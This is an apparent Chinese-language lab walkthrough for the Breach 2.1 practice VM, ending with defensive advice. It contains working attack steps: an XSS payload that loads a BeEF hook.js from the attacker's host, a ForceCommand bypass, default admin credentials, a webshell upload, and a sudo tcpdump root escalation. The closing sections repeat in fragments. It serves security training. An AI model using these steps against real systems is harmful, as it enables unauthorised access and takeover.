Breach 2.1 靶机渗透测试教学文档<\/h1>

1. 环境配置<\/h2>

1.1 网络配置<\/h3>

为靶机新建虚拟网卡<\/li>
将靶机和攻击机都放入该网段<\/li>

攻击机网络配置检查：

确认是否存在 eth1（对应新增网卡）<\/li>
如果没有，重新获取IP：sudo dhclient eth1<\/code><\/li>

或者手动分配IP：
sudo ip addr add 192.168.110.X\/24 dev eth1
sudo ip link set eth1 up
<\/code><\/pre>
<\/li>
<\/ul>
<\/li>
<\/ol>
1.2 主机发现<\/h3>
使用以下命令进行主机发现（注意指定网卡）：<\/p>
arp-scan -I eth1 -l
<\/code><\/pre>
或<\/p>
netdiscover -i eth1 -r 192.168.110.0\/24
<\/code><\/pre>
2. 初始信息收集<\/h2>
2.1 端口扫描<\/h3>
使用Nmap进行扫描：<\/p>
nmap -sV -sS -T4 -p- 192.168.110.151
<\/code><\/pre>
发现开放端口：<\/p>

65535\/tcp - SSH<\/li>
80\/tcp - HTTP（仅在SSH登录后开放）<\/li>
<\/ul>
3. SSH服务分析<\/h2>
3.1 SSH连接尝试<\/h3>
尝试连接SSH：<\/p>
ssh root@192.168.110.151 -p 65535
<\/code><\/pre>
发现实际用户名为peter：<\/p>
ssh peter@192.168.110.151 -p 65535
<\/code><\/pre>
密码：inthesource<\/code><\/p>
3.2 SSH连接后立即断开问题<\/h3>
分析原因：<\/p>


检查SSH配置文件：<\/p>
\/etc\/ssh\/sshd_config
<\/code><\/pre>
关键配置：<\/p>
UsePAM yes
AllowUsers peter
ForceCommand \/usr\/bin\/startme
AddressFamily inet
<\/code><\/pre>
<\/li>

\/usr\/bin\/startme<\/code>内容：<\/p>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>sudo \/etc\/init.d\/apache2 start &> \/dev\/null
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3.3 绕过ForceCommand限制<\/h3>
解决方法：<\/p>

使用已获得的shell执行：
echo "exec sh" > .bashrc
<\/code><\/pre>
<\/li>
重新连接SSH<\/li>
<\/ol>
4. Web应用渗透<\/h2>
4.1 网站分析<\/h3>

访问80端口<\/li>
查看源代码，发现注释信息<\/li>
目录扫描发现\/blog目录<\/li>
发现网站由BlogPHP支持（www.blogphp.net）<\/li>
<\/ol>
4.2 XSS漏洞利用<\/h3>

注册页面：http:\/\/192.168.110.151\/blog\/register.html<\/code><\/li>
在username字段注入XSS payload：
<script<\/span> src<\/span>=<\/span>"http:\/\/<攻击机IP>:3001\/hook.js"<\/span>><\/script<\/span>>
<\/span><\/span><\/code><\/pre><\/li>
使用BeEF XSS框架接收会话<\/li>
<\/ol>
注意：确保BeEF监听地址与靶机在同一网段<\/p>
5. 提权路径<\/h2>
5.1 本地端口发现<\/h3>
发现隐藏端口：<\/p>
telnet 127.0.0.1 2323
<\/code><\/pre>
返回坐标：29 45'46" N 95 22'59" W<\/code>（Houston城市）<\/p>
5.2 登录隐藏服务<\/h3>
使用凭据：<\/p>

用户名：milton<\/li>
密码：houston<\/li>
<\/ul>
5.3 交互式问答<\/h3>

问题："Whose stapler is it?"<\/li>
正确答案："mine"（来自\/usr\/local\/bin\/cd.py分析）<\/li>
<\/ol>
5.4 发现新服务<\/h3>
开放端口：8888\/tcp（osCommerce）<\/p>
5.5 osCommerce渗透<\/h3>


后台管理地址：\/admin<\/code><\/p>
<\/li>

弱密码：admin\/admin<\/p>
<\/li>

查找可写目录：<\/p>
find \/var\/www\/html2\/oscommerce -perm -o=w
<\/code><\/pre>
发现：\/var\/www\/html2\/oscommerce\/includes\/work<\/code><\/p>
<\/li>

上传Webshell并访问<\/p>
<\/li>
<\/ol>
6. 最终提权<\/h2>
6.1 sudo权限检查<\/h3>
发现milton用户可以无密码使用tcpdump：<\/p>
sudo -l
<\/code><\/pre>
6.2 tcpdump提权方法<\/h3>
参考步骤：<\/p>

创建恶意脚本：
echo '#!\/bin\/bash\n\/bin\/bash'<\/span> > \/tmp\/test
<\/span><\/span>chmod +x \/tmp\/test
<\/span><\/span><\/code><\/pre><\/li>
设置PATH环境变量：
export PATH=\/tmp:$PATH
<\/code><\/pre>
<\/li>
执行tcpdump：
sudo tcpdump -ln -i eth0 -w \/dev\/null -W 1 -G 1 -z test -Z root
<\/code><\/pre>
<\/li>
<\/ol>
7. 关键知识点总结<\/h2>

ForceCommand绕过<\/strong>：通过修改.bashrc添加exec sh命令<\/li>
隐藏服务发现<\/strong>：检查本地回环端口（127.0.0.1）<\/li>
交互式服务利用<\/strong>：分析Python脚本确定正确答案<\/li>
Web应用渗透<\/strong>：

BlogPHP的XSS漏洞<\/li>
osCommerce的文件上传漏洞<\/li>
<\/ul>
<\/li>
提权技术<\/strong>：

sudo tcpdump提权<\/li>
环境变量劫持<\/li>
<\/ul>
<\/li>
<\/ol>
8. 防御建议<\/h2>

限制SSH的ForceCommand功能<\/li>
避免使用弱密码<\/li>
限制Web目录的写权限<\/li>
谨慎配置sudo权限<\/li>
及时更新易受攻击的Web应用<\/li>
<\/ol>

Breach 2.1 靶机渗透测试教学文档<\/h1>

1. 环境配置<\/h2>

2. 初始信息收集<\/h2>

3. SSH服务分析<\/h2>

4. Web应用渗透<\/h2>

5. 提权路径<\/h2>

5.4 发现新服务<\/h3> 开放端口：8888\/tcp（osCommerce）<\/p>

6. 最终提权<\/h2>

8. 防御建议<\/h2> 限制SSH的ForceCommand功能<\/li> 避免使用弱密码<\/li> 限制Web目录的写权限<\/li> 谨慎配置sudo权限<\/li> 及时更新易受攻击的Web应用<\/li> <\/ol>

5.4 发现新服务<\/h3>
开放端口：8888\/tcp（osCommerce）<\/p>

8. 防御建议<\/h2>

限制SSH的ForceCommand功能<\/li>
避免使用弱密码<\/li>
限制Web目录的写权限<\/li>
谨慎配置sudo权限<\/li>
及时更新易受攻击的Web应用<\/li> <\/ol>